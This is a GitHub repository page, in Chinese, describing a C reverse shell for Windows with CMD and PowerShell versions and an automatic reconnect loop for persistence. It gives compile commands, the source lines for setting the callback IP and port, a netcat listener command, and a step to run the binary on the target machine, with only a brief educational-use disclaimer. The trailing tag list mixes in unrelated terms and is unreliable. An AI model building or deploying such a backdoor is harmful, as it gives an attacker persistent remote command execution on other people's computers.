neutralwarrior/C-Windows-reverse-shell
GitHub: neutralwarrior/C-Windows-reverse-shell
一个用 C 语言编写的 Windows 反向 Shell,提供 CMD 和 PowerShell 两个版本,内置持久化重连机制。
Stars: 5 | Forks: 0
# Windows 反向 Shell(C 语言实现)
一个用 C 语言编写的 Windows 反向 Shell,可回连至监听器并等待指令。
提供 CMD 和 PowerShell 两个版本,包含持久连接重试逻辑。
## 版本
- **Reverse-cmd-shell.c** — 使用 `_popen()` 生成 CMD shell 的概念验证版本
- **Reverse-powershell-shell.c** — 升级版本,使用 `CreateProcess()` 并通过正确的管道重定向生成 PowerShell shell,同时捕获 stdout 和 stderr
## 使用方法
通过 MinGW 使用 GCC 编译:
```
gcc Reverse-cmd-shell.c -o Reverse-cmd-shell -lws2_32
gcc Reverse-powershell-shell.c -o Reverse-powershell-shell -lws2_32
```
编译前,请在源文件中设置您的 IP 和端口:
```
routeinfo.sin_addr.s_addr = inet_addr("YOUR_IP_HERE");
routeinfo.sin_port = htons(YOUR_PORT_HERE);
```
在您的机器上启动一个监听器:
```
nc -lvnp YOUR_PORT_HERE
```
然后在目标 Windows 机器上运行编译后的可执行文件。
## 功能特性
- 每隔 5 秒持续重试连接,直到监听器可用
- 支持相应 Shell 接受的任何命令
- 同时捕获 stdout 和 stderr(PowerShell 版本)
## 免责声明
仅供教育目的。请仅在您拥有或已获授权测试的系统上使用。
## 许可证
MIT
标签:Cmd, GCC, Gophish, IPv6, IP 地址批量处理, MinGW, OpenCanary, PowerShell, Socket编程, 反向Shell, 反弹连接, 后门, 客户端加密, 恶意代码, 数据展示, 标准流重定向, 渗透工具, 端点可见性, 红队, 网络安全, 自动化连接, 远程控制, 隐私保护